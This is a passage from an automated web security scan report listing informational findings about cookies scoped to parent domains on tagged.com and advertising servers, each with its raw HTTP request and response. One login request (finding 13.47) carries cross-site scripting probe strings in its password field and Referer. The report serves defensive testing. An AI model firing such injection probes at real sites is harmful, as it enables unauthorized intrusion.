GET /site=776692/size=728090/u=2/bnum=69569526/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=terms_of_service&t=4342
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; C2=s1B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=BgZHQ3EBAAAABAAAAYAAgEA; BASE=x7Q9Ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+kePmTH!; ROLL=U6APEje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlI!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:38:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1007584.776692.0XMC
Set-Cookie: F1=BAaHQ3EBAAAABAAAAcAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:38:24 GMT; path=/
Set-Cookie: BASE=x7Q9Ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+kmPmTH!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:24 GMT; path=/
Set-Cookie: ROLL=U6APFje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWJ!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:24 GMT; path=/
Set-Cookie: 69569526=_4dd01da0,7784833352,776692^1007584^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:38:24 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 601

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000776692/mnum
...[SNIP]...

13.43. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=75068257/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=75068257/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=75068257/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=index&t=8004
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2=DJ9zNFJwIsb0F7RqHjQCiZAc

Response

HTTP/1.1 302 Found
Connection: close
Date: Sun, 15 May 2011 18:35:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Location: http://r1-ads.ace.advertising.com/ctst=1/site=776692/size=728090/u=2/bnum=75068257/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252F
Set-Cookie: ACID=oH320013054845430015; domain=advertising.com; expires=Tue, 14-May-2013 18:35:43 GMT; path=/
Set-Cookie: ASCID=oH320013054845430015; domain=advertising.com; path=/
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:35:43 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 317

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://r1-ads.ace.advertising.com/ctst=1/site=776692/size=728090/u=2/bnum=75068257/hr=13/hl=1/c=3/scres=5/swh=1920x12
...[SNIP]...

13.44. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=81707588/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Ffind_groups.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=81707588/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Ffind_groups.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=81707588/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Ffind_groups.html HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=find_groups&t=1362
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; C2=o2B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=BEbHQ3EBAAAABAAAA4AAgEA; BASE=x7Q9Ki23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpCTjtvy2vvmXa3CqqiTY9EZTN3JW20eLPN!; ROLL=U6APMje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZddqdZLZ49wJCPtHdWluzNpOTwuc9H5GWMO!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:38:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.954107.776692.0XMC
Set-Cookie: F1=BMbHQ3EBAAAABAAAA8AAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:38:43 GMT; path=/
Set-Cookie: BASE=x7Q9Li23SwnkpMdYS8Ne5ru2BcaVK0Bv+kuPmTntoWJelwznY4jXxpCTjtvy2vvmXa3CqqiTY9EZTN3JW20eLPdrgh1P5SM!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:43 GMT; path=/
Set-Cookie: ROLL=U6APNje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlIxo0kTqWZc1o6Dt86oeMfhU88Mx1KlZddqdZLZ49wJCPtHdWluzNpOTwuc9H5GWMuk/lQ81tI!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:43 GMT; path=/
Set-Cookie: 81707588=_4dd01db3,4715256256,776692^954107^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:38:43 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 1043

function AdClicked(url)
{
var clickLineDisabled = "$dcli";
if(clickLineDisabled=="1")
{
return;
}

var winOpen = "1";
if(winOpen == "1")
{
w
...[SNIP]...

13.45. http://r1-ads.ace.advertising.com/site=776692/size=728090/u=2/bnum=94465860/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html%253F

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r1-ads.ace.advertising.com
Path:   /site=776692/size=728090/u=2/bnum=94465860/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html%253F

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /site=776692/size=728090/u=2/bnum=94465860/hr=13/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.tagged.com%252Fterms_of_service.html%253F HTTP/1.1
Host: r1-ads.ace.advertising.com
Proxy-Connection: keep-alive
Referer: http://c5.zedo.com/jsc/c5/ff2.html?n=496;c=121;s=1;d=14;w=728;h=90;p=;q=terms_of_service&t=5555
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=qw280013054845430029; ASCID=qw280013054845430029; aceRTB=rm%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cam%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Cdc%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Can%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7Crub%3DTue%2C%2014%20Jun%202011%2018%3A35%3A53%20GMT%7C; C2=s1B0NFJwIsb0F8QqHjQCiZEYi+CCeziBwB; F1=BwWHQ3EBAAAABAAAAUAAgEA; BASE=x7Q9Ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+kWPmTH!; ROLL=U6APHje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+I!

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 15 May 2011 18:38:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1007584.776692.0XMC
Set-Cookie: F1=BgZHQ3EBAAAABAAAAYAAgEA; domain=advertising.com; expires=Tue, 14-May-2013 18:38:16 GMT; path=/
Set-Cookie: BASE=x7Q9Ei23SwnkpMdYS8Ne5ru2BcaVK0Bv+kePmTH!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:16 GMT; path=/
Set-Cookie: ROLL=U6APEje2uuEWubpKMml2fH2mYRDmKrCsOYFCDpOukMr/p+YaiA5CAlI!; domain=advertising.com; expires=Tue, 14-May-2013 18:38:16 GMT; path=/
Set-Cookie: 94465860=_4dd01d98,7178131662,776692^1007584^1183^0,0_; domain=advertising.com; path=/click
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 15 May 2011 18:38:16 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 601

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5155.272756.AOL-ADVERTISING/B5116932;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000776692/mnum
...[SNIP]...

13.46. http://secure.tagged.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://secure.tagged.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: secure.tagged.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sun, 15 May 2011 18:35:27 GMT
Server: Apache
Set-Cookie: S=k48nnbumc29k7tunhd4mautaa0; path=/; domain=tagged.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.tagged.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 0


13.47. https://secure.tagged.com/secure_login.html

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.tagged.com
Path:   /secure_login.html

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /secure_login.html?username=&password=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x000043%29%3C%2Fscript%3E&token=88db48c3004723571667ba30eebca51e&perslogin=Y HTTP/1.1
Host: secure.tagged.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://secure.tagged.com/secure_login.html?ver=2&loc=en_US&uri=http%3A%2F%2Fwww.tagged.com&display=full&3b883%22%3E%3Cscript%3Ealert(%22INSECURE%22)%3C/script%3E868fc1f78e0=1

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 18:51:11 GMT
Server: Apache
Set-Cookie: S=eukphp97h1sm400vgrjmip7qj6; path=/; domain=tagged.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=300
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 4061

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<link rel="stylesheet" type="text/css" href="https://secure-static.tagged.com/dyn/css/3/_2
...[SNIP]...

13.48. http://segment-pixel.invitemedia.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=18842&partnerID=134&